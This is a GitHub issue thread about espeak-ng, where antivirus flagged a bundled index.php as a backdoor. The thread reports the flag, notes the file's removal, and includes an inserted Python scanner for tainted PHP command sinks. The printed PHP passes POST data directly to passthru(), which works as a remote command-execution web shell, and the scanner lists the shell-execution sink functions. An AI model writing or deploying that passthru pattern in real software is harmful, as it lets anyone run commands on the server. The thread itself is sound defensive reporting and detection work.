
Win 10 quarantines an index.php file as being the backdoor:PHP/Dirtelti.HA trojan #1867

Open
mystyc opened this issue Feb 22, 2024 · 2 comments

Comments

@mystyc

mystyc commented Feb 22, 2024

In the tar.gz file for release version 1.51, Windows 10 will quarantine the following file upon accessing it (including unzipping it):
./chromium_extension/index.php
Windows will identify it as the "backdoor:PHP/Dirtelti.HA" trojan and label it as being a severe threat. The named trojan is a secure shell tunneling vulnerability with rather simple variants being any PHP script that uses eval() or echo.
The contents of the index.php file, shown below, do not appear to be deliberately malicious and it is otherwise not particularly sinister, but it might be a good idea to rewrite it.

<?php
if (isset($_POST["espeakng"])) {
    header('Vary: Origin');
    header("Access-Control-Allow-Origin: chrome-extension://<id>");
    header("Access-Control-Allow-Methods: POST");
    header("Content-Type: application/octet-stream");
    header("X-Powered-By:");
    echo passthru($_POST["espeakng"]);
    exit();
}

I did not even know there was a chrome extension or something, so I don't know if it is critical or not.

In any case, for those who might freak the f*ck out at the Severe Virus Threat Warning, nothing will activate if you simply delete it (if you want) or if you let Windows quarantine it.

This index.php file is only 324 bytes, but variants of the Dirtelti trojan of a similar size seem to either need to access another (presumably larger) file, or to otherwise send a call-home signal.
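As an added illustration (not code from this issue or from the espeak-ng project): the pattern Defender is reacting to in the snippet above is request input passed straight into a PHP command-execution sink (`passthru($_POST[...])`), which makes the script a remote command runner for anyone who can reach it. The Python check below is the kind of pre-release scan that would have flagged the file before it shipped in a tarball. The issue's snippet is embedded as a constructed sample, together with a hypothetical hardened rewrite that only passes fixed, `escapeshellarg`-quoted values to the shell; the function and constant names are my own.

```python
"""Static check: PHP request superglobals flowing directly into command/eval sinks."""
import re

# PHP functions that hand a string to a shell or to the PHP interpreter.
SINKS = ("passthru", "system", "exec", "shell_exec", "popen", "proc_open", "eval")
# Attacker-controlled request data.
TAINT_SOURCES = re.compile(r"\$_(POST|GET|REQUEST|COOKIE|SERVER)\b")
SINK_CALL = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(")

# Constructed copy of the index.php posted in the issue.
ORIGINAL_SNIPPET = """<?php
if (isset($_POST["espeakng"])) {
    header('Vary: Origin');
    header("Access-Control-Allow-Origin: chrome-extension://<id>");
    header("Access-Control-Allow-Methods: POST");
    header("Content-Type: application/octet-stream");
    header("X-Powered-By:");
    echo passthru($_POST["espeakng"]);
    exit();
}
"""

# Hypothetical hardened rewrite (constructed, not project code): the binary and
# flags are fixed, the voice is allowlisted, and every dynamic value is quoted.
HARDENED_SNIPPET = """<?php
$allowed = ['en', 'de'];
$voice = $_POST['voice'] ?? 'en';
if (!in_array($voice, $allowed, true)) { http_response_code(400); exit(); }
$text = $_POST['text'] ?? '';
header('Content-Type: application/octet-stream');
passthru('espeak-ng -v ' . escapeshellarg($voice) . ' --stdout ' . escapeshellarg($text));
"""


def _argument_text(src, open_idx):
    """Return the text between the '(' at open_idx and its matching ')'."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    return src[open_idx + 1:]  # unbalanced source: take the remainder


def find_tainted_sinks(php_source):
    """Return (line_number, sink_name, argument_text) for every sink call whose
    argument list contains a request superglobal. Direct use only: the check
    does not follow assignments, so it is a triage heuristic, not a proof of safety."""
    findings = []
    for m in SINK_CALL.finditer(php_source):
        args = _argument_text(php_source, m.end() - 1)  # m.end()-1 is the '('
        if TAINT_SOURCES.search(args):
            line = php_source.count("\n", 0, m.start()) + 1
            findings.append((line, m.group(1), args.strip()))
    return findings


if __name__ == "__main__":
    for name, src in (("original", ORIGINAL_SNIPPET), ("hardened", HARDENED_SNIPPET)):
        hits = find_tainted_sinks(src)
        print(f"{name}: {'FLAGGED ' + repr(hits) if hits else 'no direct taint-to-sink'}")
```

Because the scanner only looks for a superglobal inside a sink's argument list, the hardened sample comes back clean even though it still calls `passthru`; the real safety there comes from the fixed command line and `escapeshellarg`, which the check does not verify. Treat a "clean" result as "nothing obvious", and a flagged result as something to pull from the release before packaging.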

@djphoenix
Collaborator

That's why it was removed in #1598

tksldk added a commit to tksldk/nixpkgs that referenced this issue Mar 26, 2024
Fixes: espeak-ng/espeak-ng#1867

Removes backdoor php file identified by Anti-Virus as severe threat
@Brokenpoet

Windows Defender also alerts to the same virus on the Source Code .zip File.
